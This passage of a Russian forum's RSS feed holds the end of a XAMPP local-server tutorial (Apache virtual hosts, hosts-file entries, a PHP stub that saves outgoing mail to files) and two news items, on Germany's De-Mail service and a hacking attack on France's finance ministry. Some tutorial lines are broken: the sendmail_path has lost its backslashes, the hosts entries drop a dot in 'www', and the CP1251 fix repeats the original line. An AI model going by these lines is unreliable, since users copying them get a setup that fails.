    DocumentRoot &amp;quot;C:\my_projects\blog.local\www&amp;quot;
    ServerName blog.local
    ServerAlias www.blog.local
    ErrorLog &amp;quot;C:\my_projects\blog.local\logs\error.log&amp;quot;
    CustomLog &amp;quot;C:\my_projects\blog.local\logs\access.log&amp;quot; combined
  &amp;lt;Directory &amp;quot;C:\my_projects\blog.local\www&amp;quot;&amp;gt;
    AllowOverride All
    Order allow,deny
    Allow from all
  &amp;lt;/Directory&amp;gt;
&amp;lt;/VirtualHost&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Верхний виртуальный хост, выделен другим цветом, позволит нам по прежнему заходить на localhost (локальный сайт XAMPP).&lt;/p&gt;
						&lt;p&gt;Следующим шагом нам потребуется добавить две строчки в файл hosts, расположенный по следующему адресу C:\Windows\System32\drivers\etc\hosts (также рекомендую создать для него ярлык в папке сервера):&lt;br /&gt;127.0.0.1 blog.local&lt;br /&gt;127.0.0.1 wwwblog.local&lt;/p&gt;
						&lt;p&gt;Заходим в панель управления XAMPP (XAMPP Control Panel) и перезапускаем Apache. Теперь проверим наш сайт, который должен работать по адресу wwwblog.local. Если все сделано верно, то мы увидим приветствие «Hello world!».&lt;/p&gt;
						&lt;p&gt;Так как скорее всего понадобится создание нескольких сайтов на локальном сервере, приведу пример добавления хостов в файл httpd-vhosts.conf. Предположим новый сайт будет называться site.local:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;NameVirtualHost *:80

&amp;lt;VirtualHost *:80&amp;gt;
    DocumentRoot &amp;quot;C:\xampp\htdocs&amp;quot;
    ServerName localhost
&amp;lt;/VirtualHost&amp;gt;

&amp;lt;VirtualHost *:80&amp;gt;
    ServerAdmin webmaster@blog.local
    DocumentRoot &amp;quot;C:\my_projects\blog.local\www&amp;quot;
    ServerName blog.local
    ServerAlias www.blog.local
    ErrorLog &amp;quot;C:\my_projects\blog.local\logs\error.log&amp;quot;
    CustomLog &amp;quot;C:\my_projects\blog.local\logs\access.log&amp;quot; combined
  &amp;lt;Directory &amp;quot;C:\my_projects\blog.local\www&amp;quot;&amp;gt;
    AllowOverride All
    Order allow,deny
    Allow from all
  &amp;lt;/Directory&amp;gt;
&amp;lt;/VirtualHost&amp;gt;
&amp;lt;VirtualHost *:80&amp;gt;
    ServerAdmin webmaster@site.local
    DocumentRoot &amp;quot;C:\my_projects\site.local\www&amp;quot;
    ServerName site.local
    ServerAlias www.site.local
    ErrorLog &amp;quot;C:\my_projects\site.local\logs\error.log&amp;quot;
    CustomLog &amp;quot;C:\my_projects\site.local\logs\access.log&amp;quot; combined
  &amp;lt;Directory &amp;quot;C:\my_projects\site.local\www&amp;quot;&amp;gt;
    AllowOverride All
    Order allow,deny
    Allow from all
  &amp;lt;/Directory&amp;gt;
&amp;lt;/VirtualHost&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Также не забываем добавить следующие строчки в файл hosts в папке Windows:&lt;br /&gt;127.0.0.1 site.local&lt;br /&gt;127.0.0.1 wwwsite.local&lt;/p&gt;
						&lt;p&gt;Перезапускаем Apache и новый хост готов для работы.&lt;/p&gt;
						&lt;p&gt;По аналогии можно добавить сколько угодно виртуальных хостов.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;Немного справочной информации относительно того, что мы добавляем в файл httpd-vhosts.conf:&lt;/span&gt;&lt;br /&gt;ServerAdmin webmaster@blog.local — e-mail-адрес администратора веб-сервера;&lt;br /&gt;DocumentRoot &amp;quot;C:\my_projects\blog.local\www&amp;quot; — путь к папке с сайтом;&lt;br /&gt;ServerName blog.local — название сайта, которое набирается в браузере, может иметь любое значение, например blog или blog.ru;&lt;br /&gt;ServerAlias wwwblog.local — адрес по которому сайт также должен открываться;&lt;br /&gt;ErrorLog &amp;quot;C:\my_projects\blog.local\logs\error.log&amp;quot; — журнал ошибок;&lt;br /&gt;CustomLog &amp;quot;C:\my_projects\blog.local\logs\access.log&amp;quot; combined — журнал доступа к сайту, кто и когда заходил на сайт и с какого браузера, combined — означает, что отчет будет более информативным, можно заменить значением common (менее информативно);&lt;/p&gt;
						&lt;p&gt;&amp;lt;Directory &amp;quot;C:\my_projects\blog.local\www&amp;quot;&amp;gt;&lt;br /&gt;AllowOverride All&lt;br /&gt;Order allow,deny&lt;br /&gt;Allow from all&lt;br /&gt;&amp;lt;/Directory&amp;gt;&lt;/p&gt;
						&lt;p&gt;Приведенная выше конструкция разрешает отображение всех файлов в указанной директории и назначает максимально возможные привилегии (без AllowOverride All не будут работать ЧПУ).&lt;/p&gt;
						&lt;p&gt;Если делали все внимательно, то создание новых сайтов на виртуальном сервере не составит для вас труда, ошибки могут быть из-за синтаксиса, к примеру если вы допустите ошибку в httpd-vhosts.conf, Apache может просто не запустится. Для анализа ошибок воспользйтесь логами Apache, файл error.txt расположенный в по адресу C:\xampp\apache\logs.&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: green&quot;&gt;«Отладочная заглушка» для sendmail&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Если вы пользовались Denwer-ом, то помните, что все письма с локального сайта отправлялись в папку sendmail, это достаточно удобно, но в XAMPP такой функции не предусмотрено, в XAMPP есть собственный почтовый сервер, но он потребует немало времени, чтобы с ним разобраться.&lt;/p&gt;
						&lt;p&gt;С помощью описанной ниже инструкции, вы сможете создать такую же «заглушку» как и в Denwer.&lt;/p&gt;
						&lt;p&gt;1. В папке sendmail (C:\xampp\sendmail) создадим файл sendmail.php с кодом:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 35em&quot;&gt;&lt;pre&gt;&amp;lt;?php 

define(&#039;DIR&#039;,&#039;c:/xampp/tmp/sendmail/&#039;); 

$stream = &#039;&#039;; 
$fp = fopen(&#039;php://stdin&#039;,&#039;r&#039;); 
while($t=fread($fp,2048)) 
{ 
if( $t===chr(0) ) 
break; 
$stream .= $t; 
} 
fclose($fp); 

$fp = fopen(mkname(),&#039;w&#039;); 
fwrite($fp,$stream); 
fclose($fp); 

function mkname($i=0) 
{ 
$fn = DIR.date(&#039;Y-m-d_H-i-s_&#039;).$i.&#039;.eml&#039;; 
if ( file_exists($fn) ) 
return mkname(++$i); 
else return $fn; 
} 
?&amp;gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;В моем случае предполагается получение писем в кодировке UTF-8, если вы хотите получать письма в в кодировке CP1251, то замените строчку:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;fwrite($fp,$stream);&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;2. В файле php.ini (C:\xampp\php) заменяем строчку:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;sendmail_path = &amp;quot;C:\xampp\sendmail\sendmail.exe -t&amp;quot;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;на строчку:&lt;/p&gt;&lt;div class=&quot;code-box&quot;&gt;&lt;strong class=&quot;legend&quot;&gt;Код:&lt;/strong&gt;&lt;div class=&quot;blockcode&quot;&gt;&lt;div class=&quot;scrollbox&quot; style=&quot;height: 4.5em&quot;&gt;&lt;pre&gt;sendmail_path = C:xamppphpphp.exe c:xamppsendmailsendmail.php&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Строка должна быть раскомментирована (убрать символ точки с запятой «;» в начале строки).&lt;/p&gt;
						&lt;p&gt;3. Создадим папку sendmail в папке tmp (C:\xampp\tmp\sendmail).&lt;/p&gt;
						&lt;p&gt;4. Перезапускаем сервер Apache и теперь все отправленные письма будут в папке C:\xampp\tmp\sendmail&lt;/p&gt;
						&lt;p&gt;Дополнительная информация по XAMPP.&lt;/p&gt;
						&lt;p&gt;Расположение конфигурационных файлов:&lt;br /&gt;Apache Grundkonfiguration: .\xampp\apache\conf\httpd.conf&lt;br /&gt;Apache SSL: .\xampp\apache\conf\ssl.conf&lt;br /&gt;Apache Perl (nur mit Addon): .\xampp\apache\conf\perl.conf&lt;br /&gt;Apache Tomcat (nur mit Addon): .\xampp\apache\conf\java.conf&lt;br /&gt;Apache Python (nur mit Addon): .\xampp\apache\conf\python.conf&lt;br /&gt;PHP: .\xampp\apache\conf\php.ini (der aktuell benutzten Version)&lt;br /&gt;MySQL: .\xampp\mysql\bin\my.cnf&lt;br /&gt;phpMyAdmin: .\xampp\phpMyAdmin\config.inc.php&lt;br /&gt;FileZilla FTP: .\xampp\FileZillaFTP\FileZilla Server.xml&lt;br /&gt;Mercury Mail Grundkonfiguration: .\xampp\MercuryMail\MERCURY.INI&lt;br /&gt;Sendmail: .\xampp\sendmail\sendmail.ini&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 23:47:48 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=4#p4</guid>
		</item>
		<item>
			<title>Германия создает общенациональный email-сервис с высокой защищенностью</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=3#p3</link>
			<description>&lt;p&gt;&lt;strong&gt;Наиболее эффективный механизм борьбы со спамом известен: нужно создать такие условия, когда отправка миллионов электронных сообщений станет для отправителя экономически затратной. Либо нужно создать сверхжесткую систему аутентификации почтового трафика, чтобы каждое письмо имело существующего отправителя и получателя. Именно последнее и собираются сделать в Германии.&lt;/p&gt;
						&lt;p&gt;Система электронной почты De-Mail представляет собой правительственный сервис, в котором абсолютно все сообщения шифруются и имеют цифровую подпись, что позволяет им избежать перехвата и/или подделки во время транзита. Бизнес и обычные пользователи, желающие работать с De-Mail, должны будут подтверждать свою реальную аутентичность и запрашивать такую же аутентичность у своего получателя сообщения. Поставлять услуги De-Mail в масштабах Германии может любой провайдер, но для этого он должен пройти сертификацию и установить требуемую систему на свои серверы.&lt;/p&gt;
						&lt;p&gt;В Берлине говорят, что пока технические детали De-Mail находятся на согласовании и утверждении, но к концу марта должно начаться практическое внедрение разработки. Уже сейчас в сервисе предусмотрена опциональная возможность взимания платы за отправляемое сообщение, впрочем, эта функция не является обязательной.&lt;/p&gt;
						&lt;p&gt;Немецкие разработчики сервиса говорят, что борьба со спамом не является основной задачей De-Mail - сервис провайдеры могут работать с De-Mail, но доставлять получателям электронные сообщения также как и обычные системы электронной почты. В то же время, даже в самом лояльном режиме работы сервис будет требовать явной аутентификации отправителя сообщения, что уже ставит значительный заслон на пути спамеров. Конечно, полностью от спама не избавляет и это, но в данном случае спамерам придется создавать тысячи электронных адресов, что само по себе трудно и затратно, причем для успеха кампании каждые новые кампании придется проводить с новых ящиков.&lt;/p&gt;
						&lt;p&gt;Система подделки адресов (email-спуффинг) здесь также не работает, из-за той же явной требовательности к аутентичности ящика и владельца. Конечно, и это можно обойти, но тогда спамерам придется создавать совершенно новые базы данных, работа над которыми в разы труднее и дороже.&lt;/p&gt;
						&lt;p&gt;Юридически, в Германии электронные письма, рассылаемые через De-Mail, имеют статус официальных бумажных документов, говорят авторы системы. С технической точки зрения, De-Mail базируется на обычных интернет-стандартах - передача писем идет через SMTP, отвечающим только за коммуникацию (но не за идентификацию).&lt;/p&gt;
						&lt;p&gt;На этой неделе телекоммуникационный оператор Deutsche Telekom, поставщик корпоративных email-сервисов Mentana Claimsoft, интернет-провайдер United Internet и другие немецкие компании объявили о поддержке нового сервиса. В совместном заявлении сторон говорится, что несмотря на обособленность De-Mail с точки зрения безопасности, работать с ним с точки зрения клиента будет также просто, как с обычным email.&lt;/strong&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 22:55:32 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=3#p3</guid>
		</item>
		<item>
			<title>Хакеры атаковали министерство финансов Франции накануне саммита G20</title>
			<link>https://forumis.fludilka.su/viewtopic.php?pid=2#p2</link>
			<description>&lt;p&gt;&lt;strong&gt;Министерство финансов Франции сегодня подтвердило появившиеся в парижской прессе сведения, согласно которым ведомство в декабре прошлого года подверглось серьезной хакерской атаке, целью которой было похищение материалов саммита G20, проводившегося в Париже в феврале этого года. Министр финансов Франции Франсуа Баронин говорит, что хакерская атака действительно была, но она была отражена и документы не попали в руки атакующих.&lt;/p&gt;
						&lt;p&gt;Сегодня утром французский журнал Paris Match сообщил, что французские организаторы саммита подверглись атаке хакеров, тогда как сами злоумышленники пытались похитить документы, подготовленные страной к официальному мероприятию. Интересовали злоумышленников также внутренние французские материалы и различные международные файлы.&lt;/p&gt;
						&lt;p&gt;В рамках расследования было установлено, что всего в рамках атаки хакеры попытались получить доступ или получили его к 150 компьютерам. &amp;quot;Мы заметили, что некоторая часть информации начала перенаправляться на интернет-узлы в Китае. Хотя само по себе это мало о чем говорит, нас это заинтересовало&amp;quot;, - говорит неназванный источник в интервью журналу.&lt;/p&gt;
						&lt;p&gt;Paris Match также сообщает, что собранные доказательства были направлены в секретные службы Франции и в парижский суд. &amp;quot;Нет сомнений, что атаковавшие были профессионалами и они были очень хорошо организованы, - говорит Патрик Паиллу, генеральный директор Французского национального агентства по ИТ-безопасности. - С атакой такого уровня мы столкнулись впервые&amp;quot;.&lt;/p&gt;
						&lt;p&gt;На саммите G20 в феврале обсуждались цели, необходимые для снижения дисбаланса в глобальной экономике, а также стратегия развития монетарной политики ведущих национальных банков. Данный вопрос, с учетом развития мировых тенденций, был особенно важен для Китая. Многие страны обвиняют Китай в том, что страна намеренно скупает триллионы долларов, дабы удержать на низком курсе котировки юаня, а также получить искусственные преимущества в торговле.&lt;/strong&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (administrator)</author>
			<pubDate>Mon, 07 Mar 2011 22:49:09 +0300</pubDate>
			<guid>https://forumis.fludilka.su/viewtopic.php?pid=2#p2</guid>
		</item>
	</channel>
</rss>
